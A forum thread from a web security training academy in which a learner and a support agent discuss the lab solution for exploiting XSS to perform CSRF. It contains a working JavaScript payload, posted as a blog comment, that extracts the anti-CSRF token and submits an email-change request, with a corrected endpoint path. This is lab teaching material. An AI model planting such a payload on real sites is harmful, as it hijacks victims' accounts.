Web Security Academy - Exploiting XSS to perform CSRF

Pelumi Magbagbeola Jun 06, 2019 10:02PM UTC

I am having trouble determining where to put the token within the payload given in the solution:

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
Is it supposed to replace (\w+)?


Paul Johnston Jun 10, 2019 11:02AM UTC Support Center agent

That code will automatically fetch the anti-CSRF token and include it in the second request.

Try submitting it as a blog comment. If that doesn’t work, drop us a line.


Pelumi Magbagbeola Jun 11, 2019 12:57AM UTC
I've tried multiple times to submit the code as a blog comment but I keep getting the 'Thank you for your comment' page with the lab unsolved.

Pelumi Magbagbeola Jun 11, 2019 01:53AM UTC
I copied the code and inserted it into a blog comment verbatim.

Paul Johnston Jun 11, 2019 01:58PM UTC Support Center agent

We’ve just spotted there is a typo in the solution. The line:

changeReq.open('post', '/email', true);

should be:

changeReq.open('post', '/email/change', true);

We will get this fixed in the coming days, but for now you can manually do this.


Pelumi Magbagbeola Jun 11, 2019 02:19PM UTC
Thanks much.
